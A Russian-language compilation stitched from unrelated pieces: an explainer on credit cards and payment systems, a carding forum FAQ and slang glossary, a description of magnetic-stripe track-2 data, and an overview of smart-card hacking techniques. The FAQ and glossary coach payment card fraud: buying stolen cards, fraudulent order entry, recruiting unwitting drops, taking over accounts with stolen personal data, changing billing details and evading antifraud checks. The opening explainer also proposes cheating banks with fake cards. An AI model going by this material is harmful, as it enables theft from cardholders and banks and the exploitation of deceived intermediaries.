Кстати, по кредитным или овердрафтным картам очень часто кидают банк. Порой банку практически невозможно законно вернуть себе весь кредит даже через суд, если клиент отказывается возвращать деньги (тут, по решению суда, они могут только вычитать некоторый процент из официальной (!) зарплаты должника). Поэтому в России долгое время рядовым клиентам предоставлялись исключительно дебетовые карты (даже если карта была кредитной по определению). Лишь в последние несколько лет стало реальным купить полноценную кредитную карту.
Еще очень важную роль играет такой показатель, как лимит суммы, на которую ты можешь совершить покупку без авторизации (наличие средств на креде не проверяется, а банку-эмитенту просто направляется платежное поручение на данную сумму). К сожалению, такая сумма сравнительно мала (около $50). Вот еще один из способов обуть банк, можно даже по пустой или левой креде. Хотя, по большому счету, банку твои 50 баксов как капля в море (сильно ты их не расстроишь). В России такая система мало распространена, а жаль.
Платежные системы
Всевозможных платежных систем в мире несчетное количество - в каждой стране своя и чаще всего не одна, есть также и международные системы. Кстати, к платежным системам относятся не только банковские, но еще и системы путешествий и развлечений – так называемыеT&E (Travel & Entertainment), например, American Express и Dinners Club. Из международных систем выделяются всего несколько крупнейших: Visa, Eurocard/MasterCard, American Express (AmEx) & Dinners Club International (DCI). Также можно отметить самые масштабные системы в России: Union Card, STB и Золотая корона (правда, преимущества этих систем очень сомнительны из-за их малой распространенности). Кстати, в России, в отличие от других стран, для того, чтобы стать эмитентом, необходима специальная лицензия Центробанка.
Бесспорно, самая популярная система в мире – Visa. Эта система применяется примерно в 20000 банках в 72 странах мира, про количество пользователей говорить не имеет смысла - с каждым днем их число неуклонно растет.
Вторая по величине система Europay International. Она объединяет в себе сразу две крупных подсистемы: Eurocard/MasterCard и Cirrus/Maestro.
Теперь немного про составляющие платежной системы. За функционирование системы отвечают несколько участников (точнее, видов участников). Это эмитенты, эквайреры и расчетные банки. Каждый из участников должен четко выполнять свои функции. Эквайрер – банк, который обслуживает все необходимые финансовые сделки по кредам. Эмитент – сама организация, которая выпустила креду. Расчетные банки играют роль регуляторов между всеми участниками сделки (следят за переводом денежных средств и прочее). Нужно отметить, что за это отвечают не обязательно разные банки – все эти функции может выполнять один-единственный банк.
Классы карт
Каждая платежная система выпускает несколько видов кред, чтобы любой смог выбрать кредитку, нужную именно ему. Класс карты определяет почти все ее характеристики (остальные определяет банк). Обычно выпускаются креды электронного (для банкоматов и терминалов), экономичного, стандартного и элитного класса. Чем дороже карта, тем больше у нее преимуществ: большой лимит кредита, принимается в большем количестве мест, ты получаешь множество всяких скидок, подарков и прочего, плюс, конечно, великолепный сервис.
Visa предлагает на выбор кредитки Electron, Classic, Gold, Platinum и несколько других, более редких. Я расположил креды в порядке их стоимости. За годовое обслуживание Visa Electron берут примерно 5 баксов, за Classic – 25, а за Gold – все 100. Visa Electron предназначена только для использования в банкоматах и электронных терминалах в магазинах. Classic и Gold – кредитки класса повыше, но для их использования необходимо, чтобы баланс твоего счета не опускался ниже определенной суммы: обычно $100 для Classic и $1000 для Gold (хотя иногда такое ограничение банками опускается). Различие между Classic и Gold довольно незначительно, отличаются они в основном большим количеством дополнительных фишек у последней. Это были дебетовые карточки. Visa Platinum – это уже овердрафтная карта. Стоит эта карта соответственно названию, и получить ее тяжело. Но за это ты получаешь кредитный лимит в $20000 и просто немыслимое количество всяких страховок, скидок и прочего и прочего.
В системе Eurocard/MasterCard применяются аналогичные креды: Cirrus/Maestro, Mass, Gold. Все характеристики примерно те же, что и у Visa.
Электронные карты
Ни для кого не секрет, что по кредиткам можно расплачиваться и в инете. Все бы хорошо, но тут возникает большая проблема безопасности. Для оплаты покупки непосредственно в интернет-магазине приходится сообщать свои идентификационные данные, после этого их конфиденциальность оказывается под угрозой. Для того чтобы обезопасить все финансовые операции через Сеть, созданы специальные платежные подсистемы. Таких систем в инете очень много, пожалуй, самая известная в России – WebMoney, но она не ориентируется на работу с кредитками, поэтому WebMoney я рассматривать не буду. Прочие популярные системы: CyberPlat, ASSIST, PayCash, RBS и ЭлИТ. Принцип функционирования этих систем примерно одинаков – они являются посредниками между тобой, банком и интернет-магазином. Конечно, за свои услуги они оставляют себе некоторый процент от суммы сделки, но зато гарантируют сохранность твоих средств и конфиденциальность данных. Почти все эти системы обеспечивают работу с картами международных платежных систем Visa, Eurocard/Mastercard, American Express и Dinners Club, а также иногда обслуживают и креды российских платежных систем.
Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL; используется цифровая подпись; гарантируется юридическая чистота обеих сторон; используются особые сертификаты SET; полная выписка счета обо всех проведенных финансовых операциях. Такая схема удобна и продавцам, и покупателям, которым не жалко отдать какую-то сумму за безопасность. Есть у таких систем и свои минусы: например, можно работать только с магазином, зарегистрированным в данной сети. Также иногда для работы необходимо поставить фирменную программу.
Итого
Вот, собственно, и все, что я хотел рассказать про роль и функции кредиток в финансовой системе. На тему кредиток пишут диссертации, создают целые порталы в Сети, пишут огромные документации. Сам понимаешь, весь этот материал просто невозможно было охватить, но я постарался описать все самое существенное и примечательное.
Словарь
Аверс – лицевая сторона кредитки
Импринтер – девайс у продавца, делающий отпечаток эмбоссированных данных на чек
Картридер – устройство для чтения данных с карты
Расчетный банк – банк, регулирующий финансовые операции между участниками сделки
Реверс – оборотная сторона креды
Типпинг – процесс оттиска эмбоссированных данных на чек
Эквайрер – банк, входящий в платежную систему и обслуживающий все финансовые операции по кредам
Эмбоссинг – процесс выдавливания (тиснение) текста на поверхности кредитки, таким образом выдавливают номер креды/дату окончания ее действия/кард-холдерс-нейм и прочее (отсюда название карт - эмбоссированные)
Эмитент – организация, выпустившая карточку
Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца.
Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.
Безопасность сделки может обеспечиваться следующими способами: инет-магазин не получает твоих идентификационный сведений (они хранятся только у платежной подсистемы); канал передачи данных защищается при помощи SSL.
Q: Что такое креды, CC, картон и где их достать?
A: Это и есть кредитные карты, именно благодаря им существуем мы.
Способов достать CC много - от банальной кражи до взлома интернет магазина, но на данном этапе я бы посоветовал вам незаморачиваться и просто купить их у известных людей на данном форуме.
Q: Я новичек в кардинге. В какой теме лучше начать работать?
A: Если вообще ноль в кардинге, то мой тебе совет начинать с вбива, для того чтобы хоть немного получить представление о кардинге. Прочти все статьи в этом разделе - это поможет тебе составить хоть какое-то представление о нашем деле.
Настрой машину для вбива, обеспечь себе безопасность и ищи работодателя.
Q: Кто такой вбивальшик?
A: Это человек который занимается вбивом информации по кредитной карте в какой нибудь магазин, от него во много зависит удачный исход всей операции. Подробнее о том что это такое вы можете узнать здесь.
Q: Примерно сколько получает вбивальщик за свою работу?
A: Ну это все зависет от того как вы договаритесь со своим работадателем, чей будет расходный материал (карты, прокси и т.д.) и какова сложность работы. В среднем за вбив платят от $2 до $5.
Q: Что такое эмитет?
A: Это банк который выпустил саму кредитную карту, узнать название банка который эмитировал карту можно с помощью программы CC2Bank
Q: Что такое бин?
A: Бин это первые 4 или 6 символов в номере кредитной карты, именно по нему и узнают что за банк эмитирует кредитную карту, а также тип карты.
Q: Что такое CVV/CVV2 код?
A: Это 3-4 дополнительные цифры, призванные улучшить защиту кредитных карт, в данный момент очень тяжело найти места где бы принимали карты без CVV.
Q: Как выглядит информация по кредитной карте?
A: Подробнее об этом вы можете узнать здесь
Q: Что такое карты с Full Info и зачем они нужны?
A: Это информация по кредитной карте включающая в себя по мимо стандартных данных еще и SSN, DOB, PIN, MMN и т.д. Такая информация нужна в тех случаях когда требуются более полные данные по держателю карты (например при энроле) или обнале.
DOB - Date of birth
SSN - Social Security Number
MMN - Mothers Maiden Name
Некоторые фулки включают в себя PIN => они же дампы.
Для обнала такой карты тебе нужны след. данные cc# ,exp, PIN,определённый бин по которому налят (т.е. если у карты нет track2,чтобы генераторщик смог пробить его по определённым бинам) и естественно опытный нальщик.
Q: Кто такой дроп?
A: Это человек принимающий на своё имя какой либо скарженый тобой товар, после чего он пересылает его тебе или другому дропу (вообще тут бывают разные варианты). Чаще всего дропы не знают что они принимают украденные вещи и рано или поздно за ними придут копы.
Q: Я снял с карты около $50-$100 станут ли меня искать за эти деньги?
A: По идеи конечно вас должны будут искать, но на практике это бессмыслено, т.к. ваши поиски выльются в более крупные суммы.
Q: Что такое PayPal или палка?
A: Очень популярна онлайновая система оплаты различных услуг в USA, имеется возможность пополнения аккаунта с помощью кредитной карты.
Q: Вы не могли бы подсказать шопы которые 100% шлют товар?
A: Нет, это информация представляет собой определённую ценность и просто так вам никто не подскажет шоп который 100% шлёт товар.
Q: Что такое tracking number или трэк?
A: После того как ты заказал в шопе товар его высылают на дропа с помощью почты или курьерской службы. Самые известные из этих служб UPS, FedEx, AirBorne и т.д. Так вот после того как товар будет выслан тебе выдаётся этот самый трэк, с помощью которого на сайте курьерской службы ты и можешь узнать где в данный момент находится посылка.
Q: Как мне перевести деньги с кредитной карты на WM?
A: Никаких способов напрямую перевести деньги с кредитной карты на WebMoney несуществует.
Q: Что такое фрауд?
A: В переводе с английского "мошенничество", в принципе перевод полностью отображает значение этого термина.
Q: Что такое антифрод и как его обойти?
A: Это система защиты от мошенничества - различные дополнительные проверки.
Как обойти - будь полностью как амер, во всех ипостасях, и будет всё ок.
Иногда проще забить на шоп с сильной системой антифрода, чем пытаться ее обойти.
Credit line - сумма кредита, которую банк дает (доверяет) на траты и покупки сейчас и которую клиент сможет погасить потом.
Current Balance - сколько потратил, столько потом придется возвращать банку.
А из Credit line вычитается
Available Credit - сколько еще можно потратить.
Карта или точнее кредит выдается на год или несколько лет. Поэтому на карте пишется
Expiration date - месяц и год, когда договор с банком закончится. Например 06/2006.
Каждая карта уникальна. Для поддержания этой уникальности на них пишут
Card Number - число, чаще всего 16-ти значное. Реже встречаются 13-ти значные. У American Express по умолчанию 15-ти значное.
Следят и ухаживают за всей этой махиной расчетов по кредитным картам
Visa и Mastercard/Eurocard - международные платежные системы (МПС). У Визы номера карт начинаются на 4, у Мастеркард на 5. Остальные брэнды не так развиты и дальше собственной страны можно сказать не лезут (American Express, Discover, JCB, Золотая Корона и др.)
Бывает, что карты роняют, но не нагибаются за ними, т.к. издали она похожа на кусок мыла, и идут дальше. А поскольку при покупках на большие суммы частенько спрашивают документ, удостоверяющий личность, то для того чтобы внимательные уборщики не могли отовариваться за чужой счет, на лицевой стороне карты пишут
Cardholder's Name - имя и фамилия держателя карты. (Карта - собственность банка. Клиенту она выдается только поносить с собой, т.е. быть этим самым держателем.)
А чтобы обладатели фотографической памяти, увидев все реквизиты карты в руках владельца, не могли потом ничего купить по телефону или в онлайне по чужой карте, на ее обратной стороне пишется
CVC2 или CVV2 - три секретных цифры мелким шрифтом. У Мастеркарда это называется Card Validation Code, у Визы - Card Verification Value.
Чтобы кардхолдер знал сколько он потратил или внес на счет, банк высылает ему
Statement - ежемесячный детализированый отчет обо всех движениях денег на карте, где построчно указаны стоимость кольта, услуг юриста, налога на развлечения и т.д.
Там имеются такие важные для банка и нелюбимые кардхолдерами поля как
Minimum Payment Due - сумма ежемесячного платежа, вычисляемая и пересчитываемая каждый месяц цифра, не менее которой клиент должен вернуть банку за потраченое. Общая сумма долга делится на оставшиеся месяцы до конца договора, накручиваются проценты и все это клиент оплачивает понемножку каждый месяц вместо того чтобы вывалить мешок килобаксов на стол в конце срока. Да и надежней, не сбежит с деньгами и не умрет не вовремя.
Payment Due Date - не позже этого числа каждый месяц кардхолдер и оплачивает свой Minimum Payment Due иначе банк накрутит еще
LATE FEE - посуточный штраф за опоздание платежа.
Из лимитов в стейтменте можно еще увидеть
Cash Advance Limit - такую максимальную сумму можно получить по карте деньгами в банкомате всего (не за один раз). Единоразовый, а точнее суточный лимит по CA чаще всего бывает $500. Но в разных банках он может быть больше или меньше.
Термины в разных банках могут отличаться от вышеприеденных, но надеюсь, суть понятна, чтобы не путать баланс к оплате с лимитом на растраты. Основная путаница возникает из за принципиально иного типа карт - дебетовых. Вот там да, сколько положил на счет, столько и можешь потратить, т.е. баланс в прямом понимании.
Слэнг
billing address, биллинг - адрес проживания, куда отправляется Statement.
billing phone - телефон холдера, по которому звонит банк или шоп в случае каких нибудь неувязок.
shipping address, шиппинг - адрес, куда магазин должен отправить заказанный товар. Для крупных покупок требуется, чтобы он совпадал с биллинг адресом или был вписан в банке в свойства карты именно как шиппинг, иначе будут
траблы - trouble, проблема то есть. Траблы с шопом решаются
прозвоном - т.е. звонком в магазин с подтверждением покупки, биллинг и шиппинг адресов и всяческой своей лояльности. Если траблы с английским или немецким языком, можно заказать услуги прозвонщика, который все это профессионально (по возможности) сделает. Прозвонщику нужно сказать всю информацию, которую потребует шоп при разговоре. В разных шопах она разная, но во всех спросят
ордер (order) - номер заказа, сделанного на сайте. О чем договорились прозвонщик и шоп, можно узнать не только со слов прозвонщика, но и на сайте магазина через некоторое время. У ордера могут быть разные статусы в зависимости от магазина и используемого в нем софта. До прозвона дело может даже не дойти, если использовать
энролл (enroll) - доступ к данным карты через сайт банка. Опять же, в каждом банке своя система. Где-то может понадобиться только
MMN (mother's maiden name) - девичья фамилией матери. Где-то вместе с
DOB (date of birth) - датой рождения. Тде-то только
SSN (social secure number) - индивидуальный номер налогоплательшика. Где-то комбинация вышеперечисленных с номером ПИН или даже с
DL (driver's license) - номером водительских прав. Обычно это секретная информация. Но ведь существует
пробив - нахождение SSN, DOB, MMN, DL по различным базам данных. Пробивщик за денежку найдет данные почти на любого американца. Если время не позволяет озадачиваться пробивом или пробивщики все попропадали в оффлайн, можно купить
фуллка (full info) - все данные кардхолдера, достаточные для регистрации энролла на сайте банка.
Заэнроллив там карту, можно изменить биллинг телефон на свой, а биллиг адрес на адрес своего или чужого
дроп - человека, согласного принять и переправить куда скажут купленный товар. Делает он это за деньги или красивые обещания, как получится. Вообще этой темой занимается
дроповод - специалист по промыванию мозгов у дропов, чтобы они согласились работать с ворованным товаром. Но бывают не только
разводные дропы - "развели как лоха", но и неразводные дропы. Это партнеры, которые знают, чем занимаются и активно содействуют. Как то ищут съемные квартиры, шлют сканы документов при необходимости, могут прозвонить шоп и т.д. Требуют себе большую долю, часто кидают, но работать с ними проще конечно.
Так вот насчет ордера. Самый лучший и последний его статус:
shipped - отправлено на шиппинг адрес. Если дроповод надежный и дропы у него стабильные, можно начинать плясать, уворовано успешно. Только нужно сообщить дроповоду
трэк (tracking number) - уникальный номер посылки в почтово-курьерской службе, например в DHL, UPS или FedEx. Он появляется на сайте шопа в деталях ордера после отправки. По этому номеру можно отслеживать на сайте выбранной для отправки службы статус посылки, где она находится и что с ней происходит. Как только статус станет
delivered - доставлено, ответственность за товар переходит к дроповоду и в ближайшие дни он заплатит за товар (по идее). Кстати, следите в каком городе то доставленно. А то бывает, что посылка обратно в шоп возвращается и delivered получается слегка не там, где ожидалось.
Из негативных терминов canceled, declined, suspended, FBI, USSS, дроповод кинул. Желаю всем никогда с ними не сталкиваться, ну или хотя бы с минимальными потерями.
Не путайте ДАМПЫ с СС!
Итак, сейчас опишем что у нас должно быть написано на дорожке. Нас интересует вторая дорожка, и что же мы на ней можем увидеть?:
Она может содержать до 40 символов:
Сначала идет стартовый символ - %
Потом идет PAN - до 19 цифр, в нашем случае это номер карты.
В него входит код эмиттера карты (IIN: Issuer Identification Number) (до 6 символов), который в свою очередь состоит из:
Основного промышленного индентификатора (MII: Major Industry Identifier) (до 2х символов):
0: Зарезервированно для будущего использования стандартом ISO/TC 68.
00: Не для выпуска карт
1: Авиалинии.
2: Авиалинии и для будущего использования.
3: Путешествия и развлечения.
4: Банк/финансы.
5: Банк/финансы.
59: Финансовые организации не попадающие в рамки ISO.
6: Банки и мерчи.
7: Топливная промышленность.
8: Телекоммуникации и для будущего использования.
89: Телекоммуникации и для часных агенств.
9: Зарезервировано для национального использования.
Далее идет код эммитера (II: Issuer Identifier), до 5 цифр, в некоторых случаях пишется длинна INN или его размер если он выходит за пределы ISO. Если MII равен 9 то первые три цифры - это код страны(для нас интереса не представляет)
Потом идет индивидуальный номер аккаунта (IAI: Individual Account Identification), до 12 цифр, назначается организацией, выдавшей карту
Затем идет одна цифра, используемая для проверки номера и прочей информации, вычесляется по формуле: (чуть попозже выложу формулу)
PAN мастеркарда состоит из не более 16 символов, а у VISA - 13 или 16, включая проверочную цифру.
Далее идет разделитель, один символ - =
За ним следует в некоторых случаях код страны(если PAN начинается с 59), он определяется в ISO 3166: 724 для Испании, 840 для USA и тд.
Потом в большинстве случаев идет дата окончания действия карты в формате ГГММ(годмесяц).
Затем идет трехсимвольный сервисный код, он состоит из:
Первая цифра, определяет где можно использовать карту:
0: Зарезервировано для будущего использования.
1: Для международного использования.
2: Для международного использования, с ограничениями.
3: Зарезервировано для будущего использования.
4: Зарезервировано для будущего использования.
5: Только для внутреннего использования, кроме заранее оговоренных соглашений.
6: Только для внутреннего использования, кроме заранее оговоренных соглашений, с ограничениями.
7: Не для оплаты, кроме заранее оговоренных соглашений.
8: Зарезервировано для будущего использования.
9: Для проверки.
Вторая цифра, определяет условия использования/авторизации карты(Authorization processing):
0: Транзакции осуществляются по стандартным правилам.
1: Зарезервировано для будущего использования.
2: Транзакция осуществляется эммитером, должна быть онлайн.
3: Зарезервировано для будущего использования.
4: Транзакция осуществляется эммитером, должна быть онлайн, кроме заранее оговоренных соглашений.
5: Зарезервировано для будущего использования.
6: Зарезервировано для будущего использования.
7: Зарезервировано для будущего использования.
8: Зарезервировано для будущего использования.
9: Зарезервировано для будущего использования.
Третья цифра, определяет сервисы и условия требования PIN
0: Без ограничений, нужен PIN.
1: Без ограничений.
2: Товары и услуги (не наличка).
3: ATM только и нужен PIN.
4: Только деньги.
5: Товары и услуги (не наличка) и нужен PIN.
6: Без ограничений, PIN по требованию.
7: Товары и услуги (не наличка) и PIN по требованию.
8: Зарезервировано для будущего использования.
9: Зарезервировано для будущего использования.
Потом идет хэш PVV (PIN Verification Value), 5 символов, за ним символы, зарезервируемые для использования эммитером. И в конце всего стоит завершающий символ - ?
Пример второй дорожки (придуманный): ;4598530106131217=06081211834918387276?
Обзор методов взлома смарт-карт
Индустрия смарт-карт переживает период мощного расцвета. В 2002 году по всему миру было продано почти 2 миллиарда интеллектуальных карточек со встроенным микрочипом, а в ближайшие годы ожидается рост этих цифр в разы.
Причины этого просты - области применения смарт-карт все время расширяются: от телефонной карты до жетона аутентификации пользователя ПК, от "электронного кошелька" для хранения цифровых наличных до цифрового паспорта-идентификатора. Массовое внедрение смарт-карт в повседневную жизнь сопровождается непременными заверениями официальных представителей индустрии о том, что чип-карты - это наиболее безопасная из существующих на сегодня технологий, которую сложно (читай - практически невозможно) вскрыть. Но мы с тобой знаем, что это вовсе не так
.Нравится это кому-то или нет, но вскрытие смарт-карт - явление весьма давнее и распространенное повсеместно. Как свидетельствуют специалисты, примерно с 1994 года практически все типы смарт-карточных чипов, использовавшихся в европейских, а затем в американских и азиатских системах платного телевидения, были успешно вскрыты крякерами при помощи методов обратной инженерной разработки. А добытые секреты карт (схема и ключевой материал) затем продавались на черном рынке в виде нелегальных клон-карт для просмотра закрытых ТВ-каналов на халяву.
Менее освещено в прессе другое направление - подделка телефонных смарт-карт или электронных кошельков. Однако известно, что и в этой области далеко не все в порядке с противодействием взлому. Индустрии приходится регулярно заниматься обновлением технологий защиты процессора смарт-карт, крякеры в ответ разрабатывают более изощренные методы вскрытия, и так до бесконечности.
Разновидности технологий
Классификация методов вскрытия смарт-карт может несколько различаться у разных авторов, однако чаще всего выделяют следующие категории атак, которые обычно применяются в разных сочетаниях друг с другом.
Технологии микрозондирования - с помощью микроскопа и иглы микропробника позволяет получить доступ непосредственно к поверхности чипа, где атакующий регистрирует прохождение информации (побитно), манипулирует процессами и вмешивается в работу интегральной схемы.
Программные атаки- используют обычный коммуникационный интерфейс процессора смарт-карты и эксплуатирует уязвимости защиты, выявленные в протоколах, криптографических алгоритмах и других особенностях конкретной реализации схемы. Отмечу, что чем более зрелой является технология защиты, тем чаще приходится сочетать этот метод с другими методами атак.
Анализ побочных каналов утечки информации- атакующий с высокой по времени частотой снимает аналоговые характеристики колебаний в питании и интерфейсных соединениях, а также любые другие электромагнитные излучения, порождаемые элементами схемы процессора (транзисторами, триггерами и т.п.) в ходе обычной работы.
Технологии индуцирования сбоев- напротив, создаются нештатные условия эксплуатации, чтобы вызвать ошибки в работе процессора и открыть таким образом дополнительные каналы доступа к защищенной информации.
Разрушающие атаки
Типичный чиповый модуль смарт-карты имеет тонкое пластиковое основание размером порядка одного квадратного сантиметра с контактными зонами с обеих сторон. Одна сторона модуля видна на самой смарт-карте и контактирует со считывателем. Кремниевая матрица приклеена к другой стороне основания (подсоединение с помощью тонких золотых или алюминиевых проводов). Сторона пластины, где находится чип, покрыта эпоксидной смолой, и такой чиповый модуль вклеивается в карту.
Вынуть чип из карты легко. Прежде умельцы вынимали с помощью острого ножа или ланцета, срезая пластик тыльной стороны карты до тех пор, пока не покажется эпоксидка. Позже стали быстро вынимать чип, просто разогревая пластмассу до мягкого состояния. Далее эпоксидный слой удаляется нанесением нескольких капель концентрированной азотной кислоты (более 98%). Прежде чем кислота успевает растворить слишком много эпоксидного слоя и затвердеть, кислоту и смолу смывают ацетоном. Процедура повторяется от 5 до 10 раз, пока полностью не покажется кремниевая матрица. Производить подобное надругательство над чипом необходимо аккуратно, чтобы не повредить соединительную проводку, тогда он останется работоспособным.
Если процессор совершенно новый, придется создать карту его схем. Сейчас для этого обычно применяют оптический микроскоп и цифровую камеру, с помощью которых делают большую (размером в несколько метров) мозаику из снимков поверхности чипа высокого разрешения.
У большинства чипов имеется защитный поверхностный слой (пассивация) из оксида или нитрата кремния, который предохраняет их от излучений оборудования и диффузии ионов. Азотная кислота на него не действует, поэтому для его удаления специалисты используют сложный метод сухого травления. Но это не единственная возможность для доступа к поверхности.
Другим методом, особенно когда схема в целом известна, является использование игл-микропробников, которые с помощью ультразвуковой вибрации удаляют защитный слой непосредственно под точкой контакта. Кроме того, для локального удаления защитного слоя применяются лазерные резаки-микроскопы, используемые в лабораториях клеточной биологии.
Описанная техника вскрытия, которую, я надеюсь, ты не опух читать, успешно применяется любителями-крякерами. Именно любителями, так как технологии, описанные дальше, доступны только хорошо оснащенным лабораториям, которые занимаются изучением полупроводников. В мире насчитываются сотни таких лабораторий (к примеру, в университетах и промышленных исследовательских центрах). Наиболее продвинутые крякеры арендуют эту технику.
Исследование техники разрезания чипа ведет к более общей (и сравнительно менее изученной) проблеме - атакам, которые включают в себя активную модификацию исследуемого чипа, а не просто пассивное его исследование. К примеру, есть все основания полагать, что некоторые успешные атаки пиратов на систему платного телевидения проводились с использованием рабочих станций с фокусированием ионного пучка (Focused Ion Beam workstation - FIB). Такой аппарат может вырезать траки в металлизированном слое чипа и формировать новые траки или изолирующие слои. Кроме того, FIB может имплантировать ионы для изменения толщины слоя кремния и даже строить сквозные переходы к проводящим структурам в нижележащих слоях чипа. Такие аппараты стоят несколько миллионов долларов, но, как показывает практика, не слишком богатые злоумышленники арендуют дорогое оборудование на некоторое время у крупных полупроводниковых компаний.
Обеспеченные таким инструментарием атаки на смарт-карты становятся более простыми и мощными. Типичная атака заключается в отсоединении от шины почти всех процессов ЦПУ, кроме памяти EEPROM и той компоненты ЦПУ, что генерирует доступ по чтению. Например, программный счетчик может быть оставлен подсоединенным таким образом, что области памяти по порядку становятся доступны на считывание по мере подачи тактовых импульсов.
Как только это сделано, атакующему требуется лишь одна игла микропробника для считывания всего содержимого EEPROM. В результате процесс анализа становится более легким, чем при пассивном исследовании, когда обычно анализируется только трасса выполнения. Также это помогает избежать чисто механических трудностей одновременной работы с несколькими иглами-микропробниками на линиях шины, ширина которых составляет лишь несколько микрон.
Технологии индуцирования сбоев (глич-атаки)
В принципе, создателям вычислительной техники давно известно, что к инженерно-защищенным устройствам, типа смарт-карт, которые обычно малы и компактны, с целью вызова вычислительной ошибки можно применить некоторые уровни радиационного облучения или нагревания, подачу неправильного напряжения питания или нестандартную тактовую частоту. Известно также и то, что при возникновении сбоя в вычислениях компьютерное устройство может выдать информацию, полезную для восстановления секретных данных. Однако насколько серьезна эта угроза в действительности, долгое время мало кто подозревал.
В конце сентября 1996 года коллектив авторов из Bellcore (научно-исследовательский центр американской компании Bell) сообщил о том, что обнаружена серьезная потенциальная слабость общего характера в защищенных криптографических устройствах, в частности, в смарт-картах для электронных платежей (D. Boneh, R.A. DeMillo, R.J. Lipton: "On the Importance of Checking Cryptographic Protocols for Faults", www.demillo.com/PDF/smart.pdf). Авторы назвали свой метод вскрытия "Криптоанализ при сбоях оборудования" (Cryptanalysis in the Presence of Hardware Faults). Суть же его в том, что, искусственно вызывая ошибку в работе электронной схемы с помощью ионизации или микроволнового облучения, а затем сравнивая сбойные значения на выходе устройства с заведомо правильными значениями, теоретически можно восстанавливать криптографическую информацию, хранящуюся в смарт-карте. Исследования ученых показали, что новой угрозе подвержены все устройства, использующие криптоалгоритмы с открытыми ключами для шифрования информации и аутентификации пользователя. Это могут быть смарт-карты, применяемые для хранения данных (например, электронных денег), SIM-карточки для сотовой телефонии, карточки, генерирующие электронные подписи или обеспечивающие аутентификацию пользователя при удаленном доступе к корпоративным сетям. Правда, разработанная в Bellcore атака была применима для вскрытия ключей исключительно в криптосхемах с открытым ключом - RSA, алгоритм цифровой подписи Рабина, схема идентификации Фиата-Шамира и т.д.
Главным результатом публикации работы Bellcore стало то, что к известной в узком кругу проблеме было привлечено внимание гораздо большего числа исследователей. И меньше чем через месяц после появления статьи Бонэ-ДеМилло (в октябре 1996 года) стало известно о разработке аналогичной теоретической атаки в отношении симметричных криптоалгоритмов, то есть шифров закрытия данных с общим секретным ключом. Новый метод был разработан знаменитым тандемом израильских криптографов Эли Бихамом и Ади Шамиром, получив название "Дифференциальный анализ искажений" (сокращенно ДАИ).
На примере самого распространенного блочного шифра DES эти авторы продемонстрировали, что в рамках той же "беллкоровской" модели сбоя в работе аппаратуры можно "вытащить" полный ключ DES из защищенной смарт-карты путем анализа менее 200 блоков шифртекста (блок DES - 8 байт). Более того, впоследствии появился еще ряд работ Бихама - Шамира с описанием методов извлечения ключа из смарт-карты в условиях, когда о реализованной внутри криптосхеме неизвестно практически ничего. Окончательную версию статьи с описанием этой работы утягивай с www.cs.technion.ac.il/users/wwwb/cgi-bin/tr-get.cgi/1997/CS/CS0910.revised.ps.
Анализ побочных каналов утечки информации
Летом 1998 года пришло известие еще об одном методе вскрытия смарт-карт, более чем успешно реализованном на практике. Совсем небольшая, состоящая из 4 человек консалтинговая криптофирма Cryptography Research из Сан-Франциско разработала чрезвычайно эффективный аналитический инструментарий для извлечения секретных ключей из криптографических устройств. Забавно, но, по словам главы фирмы Пола Кочера, исследователям "не удалось найти ни одной карты, которую нельзя было бы вскрыть".
При этом Кочер по образованию биолог, а хакерством занимался с детства как хобби. Не исключено, что именно биологическое образование помогло ему выработать собственный стиль анализа "черных ящиков", относясь к ним как к живым организмам и внимательно исследуя все доступные признаки их "жизнедеятельности".
Кочер и его коллеги, по сути, переизобрели секретные методы спецслужб и научились вскрывать защиту смарт-карт с помощью привлечения аппарата математической статистики и алгебраических методов исправления ошибок для анализа флуктуаций (небольшие колебания) в потреблении чипом электропитания. Делалось это примерно в течение полутора лет с 1996 по 1998 год, когда специалисты Cryptography Research выясняли, каким образом можно было бы повысить стойкость портативных криптографических жетонов, включая смарт-карты. Не предавая свои исследования широкой огласке, они знакомили сообщество производителей смарт-карт с разработанными в фирме видами атак, получившими названия "простой анализ питания" (ПАП) и "дифференциальный анализ питания" (ДАП). Если хочешь покопаться в этом направлении глубже, загляни по ссылочке www.cryptography.com/resources/whitepapers/DPA.html.
Вполне очевидно, что такие методы анализа заслуживают самого серьезного внимания, поскольку атаки такого рода можно проводить быстро и используя уже готовое оборудование ценой от нескольких сотен до нескольких тысяч долларов. Базовые же концепции новой методики вскрытия сформулированы в более ранней и довольно известной работе Пола Кочера "Криптоанализ на основе таймерной атаки" (в 1995 году - www.cryptography.com/resources/whitepapers/TimingAttacks.pdf). В этой работе было продемонстрировано, что можно вскрывать криптоустройства, просто точно замеряя интервалы времени, которые требуются на обработку данных.
Что же касается ПАП-атак, то здесь аналитик непосредственно наблюдает за динамикой потребления энергии системой. Количество расходуемой энергии изменяется в зависимости от выполняемой микропроцессором инструкции, а для точного отслеживания флуктуаций в потреблении питания можно использовать чувствительный амперметр. Так выявляются большие блоки инструкций (циклы DES, операции RSA и т.п.), поскольку эти операции, выполняемые процессором, имеют внутри себя существенно различающиеся по виду фрагменты. При большем усилении удается выделять и отдельные инструкции. В то время как ПАП-атаки главным образом строятся на визуальном анализе с целью выделения значимых флуктуаций питания, значительно более эффективный метод ДАП построен на статистическом анализе и технологиях исправления ошибок для выделения информации, имеющей корреляции с секретными ключами.
Новые методы атак и считывания информации из памяти
В июне 2002 года был обнародован еще один метод вскрытия смарт-карт и защищенных микроконтроллеров, получивший название "optical fault induction attack" ("атака оптическим индуцированием сбоев" - www.cl.cam.ac.uk/~sps32/ches02-optofault.pdf). Этот класс атак был обнаружен и исследован в Кембриджском университете аспирантом Сергеем Скоробогатовым (кстати, выпускником МИФИ 1997 года) и его руководителем Россом Андерсоном.
Суть метода в том, что сфокусированное освещение конкретного транзистора в электронной схеме стимулирует в нем проводимость, чем вызывается кратковременный сбой. Такого рода атаки оказываются довольно дешевыми и практичными, для них не требуется сложного и дорогого лазерного оборудования. Например, сами кембриджские исследователи в качестве мощного источника света использовали фотовспышку, купленную в магазине подержанных товаров за 20 фунтов стерлингов.
